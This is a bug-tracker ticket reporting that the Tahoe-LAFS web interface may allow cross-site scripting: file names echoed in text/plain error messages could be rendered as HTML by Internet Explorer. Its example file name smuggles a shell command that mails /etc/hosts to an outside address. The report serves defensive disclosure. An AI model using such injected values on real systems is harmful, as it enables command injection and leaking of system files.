id	summary	reporter	owner	description	type	status	priority	milestone	component	version	resolution	keywords	cc	launchpad_bug
1142	Unlikely XSS Potential in File Names in WUI	chrisp	nobody	"I have a file named ""zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts"" in the pubgrid root (http://pubgrid.tahoe-lafs.org/uri/URI%3ADIR2%3Actmtx2awdo4xt77x5xxaz6nyxm%3An5t546ddvd6xlv4v6se6sjympbdbvo7orwizuzl42urm73sxazqa/).

When you try to rename it, you get the message:

""No such child: zumby-bumby ; mail blaggy@mailinator.com < /etc/hosts""

served as text/plain. IE will render text/plain as HTML if it detects HTML in the plain text. Pathetic, but true. To attack this, the attacker would have to convince the user to add a maliciously-named file to their directory, so it's more social engineering than an automatable attack, but still."	defect	new	major	undecided	code-frontend-web	1.7.1		security xss html names wui		
